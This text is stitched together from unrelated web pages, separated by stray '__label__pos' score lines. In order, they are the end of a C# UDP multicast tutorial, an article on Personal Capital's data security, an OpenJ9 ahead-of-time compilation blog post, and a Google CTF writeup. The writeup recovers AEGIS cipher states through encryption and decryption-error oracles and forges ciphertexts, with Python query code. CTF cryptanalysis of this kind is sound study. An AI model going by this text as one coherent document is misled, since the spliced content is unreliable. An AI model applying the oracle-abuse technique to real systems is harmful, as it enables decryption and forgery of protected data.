6.2. Reducing offline complexity
For example, this is the method I implemented to solve for $x$ from $p(x \oplus a) \oplus p(x \oplus b) = c$ - it takes one second each time:
def px_subsolve(a_sub, b_sub, c_sub):
# Given a_sub, b_sub, c_sub (4 bytes), find x_sub such that
# te0[(x_sub ^ a_sub)[0]] ^ te1[(x_sub ^ a_sub)[1]] ^ te2[(x_sub ^ a_sub)[2]] ^ te3[(x_sub ^ a_sub)[3]]
# ^ te0[(x_sub ^ a_sub)[0]] ^ te1[(x_sub ^ a_sub)[1]] ^ te2[(x_sub ^ a_sub)[2]] ^ te3[(x_sub ^ a_sub)[3]]
# = c_sub
# Reformulating:
# te0[(x_sub ^ a_sub)[0]] ^ te1[(x_sub ^ a_sub)[1]] ^ te0[(x_sub ^ a_sub)[0]] ^ te1[(x_sub ^ a_sub)[1]] ^ c_sub
# = te2[(x_sub ^ a_sub)[2]] ^ te3[(x_sub ^ a_sub)[3]] ^ te2[(x_sub ^ a_sub)[2]] ^ te3[(x_sub ^ a_sub)[3]]
lhss = {}
for x0, x1 in itertools.product(range(256), repeat=2):
# LHS
xs = [be0[x0^a_sub[0]], be0[x0^b_sub[0]], be1[x1^a_sub[1]], be1[x1^b_sub[1]], c_sub]
y = reduce(_xor, xs)
lhss[y] = lhss.get(y, []) + [(x0, x1)]
solns = []
for x2, x3 in itertools.product(range(256), repeat=2):
# RHS
xs = [be2[x2^a_sub[2]], be2[x2^b_sub[2]], be3[x3^a_sub[3]], be3[x3^b_sub[3]]]
y = reduce(_xor, xs)
for x0, x1 in lhss.get(y, []):
solns.append(bytes([x0, x1, x2, x3]))
return solns
However, if we force a_sub == b'\0'*4 and b_sub == b'\1'*4 or b_sub == b'\2'*4, the right hand side can be precomputed. We are able to solve for $x$ once every 0.2 second.
At last - we are able to get the flag in 30 seconds locally and around 55 seconds online! 🎉
Credits
• Thanks @harrier_lcc who noticed that my lever did not hurt. Playing Minecraft too much, I misspelt liver.
• Thanks @hellman1908 for pointing that we are able to bruteforce byte by byte instead of bruteforcing columns, since that we can apply MixColumns inverse.
|
__label__pos
| 0.989821 |
Still celebrating National IT Professionals Day with 3 months of free Premium Membership. Use Code ITDAY17
x
?
Solved
What is wrong with my JDBC database?
Posted on 2009-05-15
11
Medium Priority
?
337 Views
Last Modified: 2013-12-15
This is the original given code from my instructor. Supposedly it is supposed to compile, however, I can't get it too and can not figure out why.
I have some things to add to it, but if I cant get it to compile in the first place then well...
I'd appreciate some help figuring out what I'm either not doing or what I'm doing wrong.
I added ojdbc14.jar to my project so I could connect to the database
I created a file in the src folder called parm.properties
here is contents:
CONN_URL=jdbc:oracle:thin:@localhost:1521:xe
DB_USERNAME=hr
DB_PASSWORD=hrpassword
DB_DRIVER=oracle.jdbc.driver.OracleDriver
package database_challenge;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.Properties;
/**
* Class file to pull parameters from a file
* @author B_Acs
*
*/
public class Parm {
private static Properties props = null;
static {
try {
props = new Properties();
Class s = Class.forName("Database.Parm");
props.load(s.getResourceAsStream("/parm.properties"));
} catch (FileNotFoundException fnfe) {
System.out.println(fnfe.getMessage());
} catch (IOException ioe) {
System.out.println(ioe.getMessage());
} catch (ClassNotFoundException cnfe) {
System.out.println(cnfe.getMessage());
}
}
// empty constructor
private Parm() {
}
public static String getSystemSetting(String pVariable) {
if (props != null) {
return ((String) props.getProperty(pVariable));
} else {
System.out.println("system variables were never initialized.");
return null;
}
}
}
//***********************************************************************************************
package database_challenge;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
/**
* Class used to connect allow for connections
* to the Oracle database
* @author B_Acs
*
*/
public class ConnectionManager {
// setting up static variables for use with the connection
private static final String DRIVER = Parm.getSystemSetting("DB_DRIVER");
private static final String CONN_URL = Parm.getSystemSetting("CONN_URL");
private static final String USER_NAME = Parm.getSystemSetting("DB_USERNAME");
private static final String PASSWORD = Parm.getSystemSetting("DB_PASSWORD");
// empty constructor
private ConnectionManager() {
}
/**
* Method to make a connection to the database
* @return
* @throws SQLException
*/
public static Connection makeConnection() throws SQLException {
// initializing connection
Connection conn = null;
try {
Class.forName(DRIVER);
conn = DriverManager.getConnection(CONN_URL, USER_NAME, PASSWORD);
conn.setAutoCommit(false);
} catch (ClassNotFoundException cnfe) {
System.out.println(cnfe.getMessage());
}
return conn;
}
}
//*******************************************************************************************
package database_challenge;
/**
* Wrapper class used to set and retrieve
* data about an employee
* @author B_Acs
*
*/
public class EmployeesWrapper {
private String firstName;
private String lastName;
private String email;
private String phoneNumber;
private String hireDate;
private double salary;
// accessor and mutator methods (getters and setters)
public String getFirstName() {
return firstName;
}
public void setFirstName(String firstName) {
this.firstName = firstName;
}
public String getLastName() {
return lastName;
}
public void setLastName(String lastName) {
this.lastName = lastName;
}
public String getEmail() {
return email;
}
public void setEmail(String email) {
this.email = email;
}
public String getPhoneNumber() {
return phoneNumber;
}
public void setPhoneNumber(String phoneNumber) {
this.phoneNumber = phoneNumber;
}
public String getHireDate() {
return hireDate;
}
public void setHireDate(String hireDate) {
this.hireDate = hireDate;
}
public double getSalary() {
return salary;
}
public void setSalary(double salary) {
this.salary = salary;
}
}
//******************************************************************************************
package database_challenge;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
/**
* Class to communicate to the database
* and display results.
* @author B_Acs
*
*/
public abstract class DatabaseService {
// static variable used for our select statement
// helps to prevent sql injection
private static final String SELECT_EMPLOYEES;
/**
* Method to return an array list of employees
* @return
*/
public static ArrayList getEmployees() {
// initializing connection
Connection conn = null;
// initializing statement
PreparedStatement stmt = null;
// initializing result set
ResultSet rs = null;
// initializing return value
ArrayList returnVal = new ArrayList();
try {
// getting connection
conn = ConnectionManager.makeConnection();
// setting the statement
stmt = conn.prepareStatement(SELECT_EMPLOYEES);
// filling the result set with results from the query
rs = stmt.executeQuery();
// looping through the result set
while (rs.next()) {
// creating an employee object
EmployeesWrapper ew = new EmployeesWrapper();
// setting the first name in the object
ew.setFirstName(rs.getString("FIRST_NAME"));
// setting the last name in the object
ew.setLastName(rs.getString("LAST_NAME"));
// adding the object to the array list
returnVal.add(ew);
}
// closing the statement
stmt.close();
} catch (SQLException esql) {
System.out.println(esql.getMessage());
} finally {
try {
if(conn != null) {
conn.close();
conn=null;
}
} catch (SQLException esql) {
System.out.println(esql.getMessage());
}
}
// returning the array list
return returnVal;
}
// static block of code for the sql statement
static {
StringBuffer tempBuffer = null;
tempBuffer = new StringBuffer();
tempBuffer.append("SELECT LAST_NAME, FIRST_NAME FROM EMPLOYEES");
SELECT_EMPLOYEES = tempBuffer.toString();
}
/**
* Main method to test our retrieval of data from the database
* @param args
*/
public static void main(String[] args) {
// initializing an array list, filling it with a list
// of employee objects from the database.
ArrayList e = DatabaseService.getEmployees();
// looping through the array list
for(int x = 0; x < e.size(); x++) {
// getting the employee object from the array list one at a time
EmployeesWrapper ew = (EmployeesWrapper) e.get(x);
// printing to the screen the employee first and last names
System.out.println(ew.getFirstName() + " " + ew.getLastName());
}
}
}
Open in new window
0
Comment
Question by:b_acs
[X]
Welcome to Experts Exchange
Add your voice to the tech community where 5M+ people just like you are talking about what matters.
• Help others & share knowledge
• Earn cash & points
• Learn & ask questions
• 5
• 4
• 2
11 Comments
Author Comment
by:b_acs
ID: 24399566
Oh yeah here is my results when I run this:
Database.Parm
Exception in thread "main" java.lang.NullPointerException
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Unknown Source)
at database_challenge.ConnectionManager.makeConnection(ConnectionManager.java:35)
at database_challenge.DatabaseService.getEmployees(DatabaseService.java:38)
at database_challenge.DatabaseService.main(DatabaseService.java:91)
0
LVL 3
Expert Comment
by:hazgoduk
ID: 24400317
It's really easy to get content from a properties file. Create a file called test.properties in the folder containing build.xml.
Have just the following text in it.
test = abc
Properties properties = new Properties();
try
{
properties.load(new FileInputStream("test.properties"));
String test = properties.getProperty("test");
System.out.println("test: |"+test+"|");
}
catch(Exception e)
{
e.printStackTrace();
}
Open in new window
0
LVL 3
Expert Comment
by:hazgoduk
ID: 24400388
Sorry, totally missed your bit at the top with the file contents...
Properties properties = new Properties();
try
{
properties.load(new FileInputStream("test.properties"));
String CONN_URL = properties.getProperty("CONN_URL");
System.out.println("CONN_URL: |"+CONN_URL+"|");
String DB_USERNAME = properties.getProperty("DB_USERNAME");
System.out.println("DB_USERNAME: |"+DB_USERNAME+"|");
String DB_PASSWORD = properties.getProperty("DB_PASSWORD");
System.out.println("DB_PASSWORD: |"+DB_PASSWORD+"|");
String DB_DRIVER = properties.getProperty("DB_DRIVER");
System.out.println("DB_DRIVER: |"+DB_DRIVER+"|");
}
catch(Exception e)
{
e.printStackTrace();
}
Open in new window
0
Simple, centralized multimedia control
Watch and learn to see how ATEN provided an easy and effective way for three jointly-owned pubs to control the 60 televisions located across their three venues utilizing the ATEN Control System, Modular Matrix Switch and HDBaseT extenders.
LVL 16
Accepted Solution
by:
warturtle earned 1600 total points
ID: 24402917
The reason for why the NullPointerException is appearing is because it cannot find the file required and hence, cannot load it to read from. Make sure that the properties file is in the correct place.
Class.forName(DRIVER); is the specific line generating the Exception.
0
Author Comment
by:b_acs
ID: 24404167
Where should the properties file be placed? I have it in the same folder as the class files.....
0
Author Comment
by:b_acs
ID: 24404173
LOL That was the problem. I was supposed to have it the source folder but not included in the package.
It is working now, thank you!
0
LVL 16
Expert Comment
by:warturtle
ID: 24404207
Hahaha... all of us make some silly mistakes while coding, but its good to see that it has been resolved. Feel free to close the ticket.
0
Author Comment
by:b_acs
ID: 24404295
Ok I have a better question for this same assignment.
I need to put the list in alphabetical order by lastname, firstname.
Now I know I need to put in an ORDER BY clause but I am unsure as to where it would go to work correctly.
If you want, I will post a new question.
0
LVL 16
Assisted Solution
by:warturtle
warturtle earned 1600 total points
ID: 24404369
The statement that you need to modify is this one: tempBuffer.append("SELECT LAST_NAME, FIRST_NAME FROM EMPLOYEES");
It needs changing to:
tempBuffer.append("SELECT LAST_NAME, FIRST_NAME FROM EMPLOYEES ORDER BY LAST_NAME, FIRST_NAME ASC");
Although we don't really need to specify ASC because it will sort the records into Ascending order by default, but I did it just for clarity.
Hope it helps.
0
Author Closing Comment
by:b_acs
ID: 31582096
Thank you! I just missed that Select statement..... I knew that's what I was looking for but I guess I've just been looking at too much code recently....lol
0
LVL 16
Expert Comment
by:warturtle
ID: 24405753
Glad to be of assistance :)
0
Featured Post
[Webinar] Lessons on Recovering from Petya
Skyport is working hard to help customers recover from recent attacks, like the Petya worm. This work has brought to light some important lessons. New malware attacks like this can take down your entire environment. Learn from others mistakes on how to prevent Petya like worms.
Question has a verified solution.
If you are experiencing a similar issue, please ask a related question
Jaspersoft Studio is a plugin for Eclipse that lets you create reports from a datasource. In this article, we'll go over creating a report from a default template and setting up a datasource that connects to your database.
Basic understanding on "OO- Object Orientation" is needed for designing a logical solution to solve a problem. Basic OOAD is a prerequisite for a coder to ensure that they follow the basic design of OO. This would help developers to understand the b…
Viewers will learn about basic arrays, how to declare them, and how to use them. Introduction and definition: Declare an array and cover the syntax of declaring them: Initialize every index in the created array: Example/Features of a basic arr…
The viewer will learn how to use and create keystrokes in Netbeans IDE 8.0 for Windows.
Suggested Courses
705 members asked questions and received personalized solutions in the past 7 days.
Join the community of 500,000 technology professionals and ask your questions.
Join & Ask a Question
|
__label__pos
| 0.880255 |
C语言 error C4996: This function or variable may be unsafe
ChatGPT 3.5 国内中文镜像站免费使用啦
零基础 C/C++ 学习路线推荐 : C/C++ 学习目录 >> C 语言基础入门
一.error C4996 简介
error C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
正常调用 fopen / memcpy / strcpy 等函数报错 error C4996,是因为许多函数、 成员函数,模板函数和 Visual Studio 中的库中的全局变量标记为弃 用 这些函数被弃用,因为它们可能具有不同的首选的名称,可能不安全或具有更加安全的变体,或可能已过时。 许多弃用消息包括不推荐使用的函数或全局变量的建议的替换。
二.error C4996 解决办法
1.采用_s结尾的安全版本
将上面的 fopen 函数改为 fopen_s 函数,例如:
/******************************************************************************************/
//@Author:猿说编程
//@Blog(个人博客地址): www.codersrc.com
//@File:C语言教程 - C语言 error C4996: This function or variable may be unsafe
//@Time:2021/06/03 08:00
//@Motto:不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
/******************************************************************************************/
#include "stdafx.h"
#include <stdio.h>
#include <iostream>
#include "windows.h"
using namespace std;
int _tmain(int argc, _TCHAR* argv[])
{
//FILE* fp = fopen("d:/12345633.txt", "r"); //error c4996
FILE* fp = NULL;
fopen_s(&fp, "d:/12345633.txt", "r"); // ok版本
if (fp)
{
printf("打开文件成功 \n");
fclose(fp);
}
else
printf("打开文件失败,失败错误号:%d \n",GetLastError());
system("pause");
return 0;
}
2.去掉 visual studio “安全开发生命周期(SDL)检查”
C语言 error C4996: This function or variable may be unsafe 插图1
3.#pragma warning( disable : 4996)
/******************************************************************************************/
//@Author:猿说编程
//@Blog(个人博客地址): www.codersrc.com
//@File:C语言教程 - C语言 error C4996: This function or variable may be unsafe
//@Time:2021/06/03 08:00
//@Motto:不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
/******************************************************************************************/
#include "stdafx.h"
#include <stdio.h>
#include <iostream>
#include "windows.h"
using namespace std;
#pragma warning( disable : 4996)
int _tmain(int argc, _TCHAR* argv[])
{
FILE* fp = fopen("d:/12345633.txt", "r");
if (fp)
{
printf("打开文件成功 \n");
fclose(fp);
}
else
printf("打开文件失败,失败错误号:%d \n",GetLastError());
system("pause");
return 0;
}
4._CRT_SECURE_NO_WARNINGS
项目 =》属性 =》c/c++ =》预处理器=》点击预处理器定义,编辑,加入_CRT_SECURE_NO_WARNINGS,如下图:
C语言 error C4996: This function or variable may be unsafe 插图1
三.猜你喜欢
1. 安装 Visual Studio
2. 安装 Visual Studio 插件 Visual Assist
3. Visual Studio 2008 卸载
4. Visual Studio 2003/2015 卸载
5. 设置 Visual Studio 字体/背景/行号
6. C语言格式控制符/占位符
7. C语言逻辑运算符
8. C语言三目运算符
9. C语言逗号表达式
10. C语言自加自减运算符(++i / i++)
11. C语言 for 循环
12. C语言 break 和 continue
13. C语言 while 循环
14. C语言 do while 和 while 循环
15. C语言 switch 语句
16. C语言 goto 语句
17. C语言 char 字符串
18. C语言 strlen 函数
19. C语言 sizeof 函数
20. C语言 sizeof 和 strlen 函数区别
21. C语言 strcpy 函数
22. C语言 strcpy_s 函数
23. C语言 memcpy 函数
24. C语言 memcpy_s 函数
25. C语言 error C4996: This function or variable may be unsafe
ChatGPT 3.5 国内中文镜像站免费使用啦
文章版权声明 1、本网站名称:猿说编程
2、本站永久网址:https://www.codersrc.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
© 版权声明
THE END
喜欢就支持一下吧
点赞3 分享
评论 抢沙发
请登录后发表评论
暂无评论内容
|
__label__pos
| 0.796743 |
The challenging thing is to supply demand with a variable supply!!
The challenging thing is to supply demand with a variable supply!!
Image for post
Uber?s technology may look simple but when A user requests a ride from the app, and a driver arrives to take them to their destination.
But Behind the scenes, however, a giant infrastructure consisting of thousands of services and terabytes of data supports each and every trip on the platform.
Like most web-based services, the Uber backend system started out as a ?monolithic? software architecture with a bunch of app servers and a single database
If you are looking for System Design of UBER, here is a video I made
For more System design videos please subscribe my channel: Tech Dummies
The system was mainly written in Python and used SQLAlchemy as the ORM-layer to the database. The original architecture was fine for running a relatively modest number of trips in a few cities.
After 2014 the architecture has evolved into a Service-oriented architecture with about 100s of services
Uber?s backend is now not just designed to handle taxies, instead, it can handle taxi, food delivery and cargo also
The backend is primarily serving mobile phone traffic. uber app talks to the backend over mobile data.
Uber?s Dispatch system acts like a real-time market platform that matches drivers with riders using mobile phones.
So we need two services
1. Supply service
2. Demand service
going forward I will be using supply for cabs and demand for riders while explaining
Supply service:
? The Supply Service tracks cars using geolocation (lat and lang) Every cab which is active keep on sending lat-long to the server every 5 sec once
? The state machines of all of the supply also kept in memory
? To track vehicles there are many attributes to model: number of seats, type of vehicle, the presence of a car seat for children, can a wheelchair be fit, and so on.
? Allocation needs to be tracked. A vehicle, for example, may have three seats but two of those are occupied.
Demand service
? The Demand Service tracks the GPS location of the user when requested
? It tracks requirements of the orders like Does a rider require small car/big car or pool etc
? demand requirements must be matched against supply inventory.
Now we have supply and demand. all we need a service which matches they demand to a supply and that service in UBER is called as DISCO
DISCO ? DISPATCH optimization
This service runs on hundreds of processes.
Core requirements of the dispatch system
1. reduce extra driving.
2. reduce waiting time
3. lowest overall ETA
How does the Dispatch system work?? How riders are matched to drivers ??
GPS/ location data is what drive dispatch system, that means we have to model our maps and location data
1. The earth is a sphere. It?s hard to do summarization and approximation based purely on longitude and latitude. So Uber divides the earth into tiny cells using the Google S2 library. Each cell has a unique cell ID.
2. S2 can give the coverage for a shape. If you want to draw a circle with a 1km radius centered on London, S2 can tell what cells are needed to completely cover the shape
Image for post
1. Since each cell has an ID the ID is used as a sharding key. When a location comes in from supply the cell ID for the location is determined. Using the cell ID as a shard key the location of the supply is updated. It is then sent out to a few replicas.
2. To match riders to drivers or just display cars on a map, DISCO sends a request to geo by supply
3. the system filters all cabs by rider?s GPS location data to get nearby cabs that meet riders requirements Using the cell IDs from the circle area all the relevant shards are contacted to return supply data.
4. Then the list and requirements are sent to routing / ETA to compute the ETA of how nearby they are not geographically, but by the road system.
5. Sort by ETA then sends it back to supply system to offer it to a driver.
How To Scale Dispatch System?
There are many ways you can build, but @ uber
1. Dispatch is built using node.js the advantage with using node is the asynchronous and event-based framework. also, it enables you to send and receive messages over WebSockets
2. so anytime client can send the message to server or server can send and whenever it wants to.
3. Now how to distribute dispatch computation on the same machine and to multiple machines?
4. The solution to scaling is Node js with ringpop, it is faster RPC protocol with gossip using SWIM protocol along with a consistent hash ring.
5. Ringpop is a library that brings cooperation and coordination to distributed applications. It maintains a consistent hash ring on top of a membership protocol and provides request forwarding as a routing convenience. It can be used to shard your application in a way that?s scalable and fault tolerant
6. SWIM is used gossip/to know what node does what and who takes which geo?s computation?s responsibility.
7. so with gossip it’s easy to add and remove nodes and hence scaling is easy
8. Gossip protocol SWIM also combines health checks with membership changes as part of the same protocol.
How supply sends messages and saved?
Apache Kafka is used as the data hub
supply or cabs uses Kafka?s APIS to send there accurate GPS locations to the datacenter.
Once the GPS locations are loaded to Kafka they are slowly persisted to the respective worker notes main memory and also to the DB when the trip is happening.
How do Maps and routing work?
Before Uber launches operations in a new area, we define and onboard a new region to our map technology stack. Inside this map region, we define subregions labeled with grades A, B, AB, and C, as follows:
Grade A: A subregion of Uber Territory covering urban centers and commute areas that makeup approximately 90 percent of all expected Uber traffic. With that in mind, it is of critical importance to ensure the highest map quality of grade A map regions.
Grade B: A subregion of Uber Territory covering rural and suburban areas that might be less populated or less traveled by Uber customers.
Grade AB: A union of grade A and B subregions.
Grade C: A set of highway corridors connecting various Uber Territories.
GeoSpatial design:
The earth is a sphere. It?s hard to do summarization and approximation based purely on longitude and latitude.
So Uber divides the earth into tiny cells using the Google S2 library. Each cell has a unique cell ID.
When DISCO needs to find the supply near a location, a circle?s worth of coverage is calculated centered on where the rider is located.
The read load is scaled through the use of replicas. If more read capacity is needed the replica factor can be increased.
How uber builds the Map?
1. Trace coverage: A comparative coverage metric, trace coverage identifies missing road segments or incorrect road geometry. The computation uses two inputs: map data under testing and historic GPS traces of all Uber rides taken over a certain period of time. We overlay those GPS traces onto the map, comparing and matching them with road segments. If we find GPS traces where no road is shown, we can infer that our map is missing a road segment and take steps to fix the deficiency.
2. Preferred access (pick-up) point accuracy: Pick-up points are an extremely important metric to the rider experience, especially at large venues such as airports and stadiums. For this metric, we compute the distance of an address or place?s location, as shown by the map pin in Figure 4, below, from all actual pick-up and drop-off points used by drivers. We then set the closest actual location to be the preferred access point for the said location pin. When a rider requests the location indicated by the map pin, the map guides the driver to the preferred access point. We continually compute this metric with the latest actual pick-up and drop-off locations to ensure the freshness and accuracy of the suggested preferred access points.
How ETAs are calculated?
that means disco should track the cabs available to ride the riders.
but IT shouldn?t just handle currently available supply, i.e. cabs which are ready to ride customer but also tracks the cars about to finish a ride.
for example:
1. a cab which is about to finish near the demand(rider) is better than allocating the cab which is far away from the demand.
2. Sometimes revising a route of an ongoing trip because some cab near to demand came online.
when uber started every cities data was separated by creating separated tables/DB this was not easy
now all the cities computation happens in the same system, since the workers the DBnodes are distributed by regions the demand request will be sent to the nearest datacenter.
Routing and Calculating ETA is important component in uber as it directly impacts ride matching and earnings.
so it uses historical travel times to calculate ETAs
you can use AI simulated algorithms or simple Dijkstra’s also to find the best route
Also you can use Driver?s app?s GPS location data to easily predict traffic condition at any given road as there are so many uber cars on the road which is sending GPS locations every 4 seconds
The whole road network is modeled as a graph. Nodes represent intersections, and edges represent road segments. The edge weights represent a metric of interest: often either the road segment distance or the time take it takes to travel through it. Concepts such as one-way streets, turn restrictions, turn costs, and speed limits are modeled in the graph as well.
One simple example you can try at home is the Dijkstra?s search algorithm, which has become the foundation for most modern routing algorithms today.
OSRM is based on contraction hierarchies. Systems based on contraction hierarchies achieve fast performance ? taking just a few milliseconds to compute a route ? by preprocessing the routing graph.
Databases:
A lot of different databases are used. The oldest systems were written in Postgres.
Redis is used a lot. Some are behind Twemproxy. Some are behind a custom clustering system.
MySQL: Built on these requirements
• linearly add capacity by adding more servers (Horizontally scalable )
• write availability with buffering using Redis
• Triggers should work when there is a change in theinstance
• No downtime for any operation (expanding storage, backup, adding indexes, adding data, and so forth).
You can use, Google?s Bigtable like any schema-less database
Trip data Storage in Schemaless
Uber is building their own distributed column store that?s orchestrating a bunch of MySQL instances called schemaless
Schemaless is key-value store which allows you to save any JSON data without strict schema validation in a schemaless fashion (hence the name).
It has append-only sharded MySQL with buffered writes to support failing MySQL masters and a publish-subscribe feature for data change notification which we call triggers.
Schemaless supports global indexes over the data.
Trip data is generated at different points in time, from pickup drop-off to billing, and these various pieces of info arrive asynchronously as the people involved in the trip give their feedback, or background processes execute.
A trip is driven by a partner, taken by a rider, and has a timestamp for its beginning and end. This info constitutes the base trip, and from this we calculate the cost of the trip (the fare), which is what the rider is billed. After the trip ends, we might have to adjust the fare, where we either credit or debit the rider. We might also add notes to it, given feedback from the rider or driver (shown with asterisks in the diagram above). Or, we might have to attempt to bill multiple credit cards, in case the first is expired or denied.
Some of the Dispatch services are keeping state in Riak.
Geospatial data and trips DB
The design goal is to handle a million GPS points writes per second
Read is even more as for every rider we need to show at least 10 nearby cabs
using Geo hash and Google s2 library all the GPS locations can be queried
Now let’s talk about ANALYTICS
Log collection and analysis
Every micro-services or service logging services are configured to push logs to a distributed Kafka cluster and then using log stash we can apply filters on the messages and redirect them to different sources,
for example, Elastic search to do some log analysis using Kibana/Graphana
1. Track HTTP APIs
2. To manage profile
3. To collect feedback and ratings
4. Promotion and coupons etc
5. FRAUD DETECTION
6. Payment fraud
7. Incentive abuse
8. Compromised accounts
Load balance:
Layer 7, Layer 4 and Layer 3 Load Balancer
• Layer 7 in application load balancing
• layer 4 is based on IP + ump/ TCP or DNS based load balance
• Layer 3 is based on only IP address
Post-trip actions:
once the trip is completed we need to do these actions by scheduling
? Collect ratings.
? Send emails.
? Update databases.
? Schedule payments.
PRICE AND SURGE:
The price is increased when there are more demand and less supply with the help of prediction algorithms.
According to UBER surge helps to meed supply and demand. by increasing the price more cabs will be on the road when the demand is more.
How To Handle Total Datacenter Failure?
• It doesn?t happen very often, but there could be an unexpected cascading failure or an upstream network provider could fail.
• Uber maintains a backup data center and the switches are in place to route everything over to the backup datacenter.
• The problem is the data for in-process trips may not be in the backup datacenter. Rather than replicate data they use driver phones as a source of trip data.
• What happens is the Dispatch system periodically sends an encrypted State Digest down to driver phones. Now let?s say there?s a datacenter failover. The next time the driver phone sends a location update to the Dispatch system the Dispatch system will detect that it doesn?t know about this trip and ask them for the State Digest. The Dispatch system then updates itself from the State Digest and the trip keeps on going like nothing happened.
9
No Responses
Write a response
|
__label__pos
| 0.750239 |
SHARE
TWEET
Untitled
a guest Feb 24th, 2020 125 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
1. <?php
2. // connexion à la base de données
3. require_once('inc/connec.php');
4.
5. $post = [];
6. $erreur = [];
7. $voirErreur = false;
8.
9. // vérification champs remplis
10. if (!empty($_POST)) {
11.
12. // verification du nombre de caractères
13. foreach ($_POST as $key => $value) {
14. $post[$key] = htmlspecialchars($value);
15. }
16.
17. if(strlen($post['nom']) < 2 || strlen($post['nom'] > 255)){
18. $erreur[] = " Votre nom ne doit pas dépasser 255 caractères !";
19. }
20.
21. if(strlen($post['prenom']) < 2 || strlen($post['prenom'] > 255)){
22. $erreur[] = " Votre prénom ne doit pas dépasser 255 caractères !";
23. }
24.
25. if(strlen($post['username']) < 2 || strlen($post['username'] > 255)){
26. $erreur[] = " Votre pseudo ne doit pas dépasser 255 caractères !";
27. }
28.
29. if(strlen($post['reponse']) < 2 || strlen($post['reponse'] > 255)) {
30. $erreur[] = " Votre reponse ne doit pas dépasser 255 caractères !";
31.
32. }
33. if(count($erreur) > 0 ) {
34. $voirErreur = true;
35. $nom = $post['nom'];
36. $prenom = $post['prenom'];
37. $username = $post['username'];
38. $reponse = $post['reponse'];
39. }
40. else {
41. //hachage du mot de passe
42. $password = password_hash($post['password'], PASSWORD_ARGON2I);
43. //inserer un membre
44. $insertmbr = $bdd->prepare('INSERT INTO membres (nom, prenom, username, password, question, reponse) VALUES (:nom, :prenom, :username, :password, :question, :reponse)');
45.
46. $insertmbr->bindValue(':nom', $post['nom'], PDO::PARAM_STR);
47. $insertmbr->bindValue(':prenom', $post['prenom'], PDO::PARAM_STR);
48. $insertmbr->bindValue(':username', $post['username'], PDO::PARAM_STR);
49. $insertmbr->bindValue(':password', $password);
50. $insertmbr->bindValue(':question', $_POST['question'], PDO::PARAM_STR);
51. $insertmbr->bindValue(':reponse', $post['reponse'], PDO::PARAM_STR);
52.
53. if($insertmbr->execute()) {
54. header('location:connexion.php?id='.$bdd->lastInsertId());
55. }
56. }
57. }
58. ?>
59. <!DOCTYPE html>
60. <html lang="fr">
61. <head>
62. <meta charset="utf-8">
63. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
64. <link rel="stylesheet" href="style-css/inscription.css">
65. <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
66. <title>Page d'inscription</title>
67. </head>
68.
69. <body>
70. <div>
71. <h1> Groupement Banque-Assurance Français</h1>
72. </div>
73. <?php
74. if($voirErreur){
75. echo implode('<br>', $erreur);
76. }
77. ?>
78. <!-- Formulaire -->
79. <form class="form" method="post" action="">
80. <h2> Formulaire d'inscription</h2>
81. <div >
82. <label class="form-label" for="nom"> Nom </label> <br/>
83. <input class="form-input" type="text" placehorder="nom" name="nom" id="nom" value="<?php if(isset($nom)) { echo $nom; }?>">
84. </div>
85.
86. <div>
87. <label class="form-label" for="prenom"> Prenom </label> <br/>
88. <input class="form-input" type="text" placehorder="prenom" name="prenom" id="prenom" value="<?php if(isset($prenom)) { echo $prenom; }?>">
89. </div>
90.
91. <div>
92. <label class="form-label" for="username"> Pseudonyme </label> <br/>
93. <input class="form-input" type="text" placehorder="username" name="username" id="username" value="<?php if(isset($username)) { echo $username; }?>">
94. </div>
95.
96. <div>
97. <label class="form-label" for="password"> Mot de passe </label> <br/>
98. <input class="form-input" type="password" placehorder="password" name="password" id="password">
99. </div>
100.
101. <div>
102. <label class="" for="question" >
103. <select name="question" class="form-label">
104. <option value="1"> Quel est le nom de votre mère ? </option>
105. <option value="2"> Quel est la destination de vos rêves ? </option>
106. <option value="3"> Quel est le métier de votre père ? </option>
107. </label>
108. </select>
109. </div>
110.
111. <div>
112. <label class="form-label" for="reponse"> Réponse question secrète</label> <br/>
113. <input class="form-input" type="text" placehorder="reponse" name="reponse" id="reponse">
114. </div>
115.
116. <div>
117. <input type="submit" name="inscription" value="Valider">
118. </div>
119. <p> Si vous possédez déjà un compte,connectez-vous <a href="connexion.php">ICI</a>! </p>
120. </form>
121. <script src="https://code.jquery.com/jquery-3.4.1.slim.min.js" integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous"></script>
122. <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
123. <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>
124. </body>
125. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top
|
__label__pos
| 0.815656 |
Parallels didn't return all VM space
Discussion in 'General Questions' started by ddollas, Jun 19, 2007.
1. ddollas
ddollas
Messages:
2
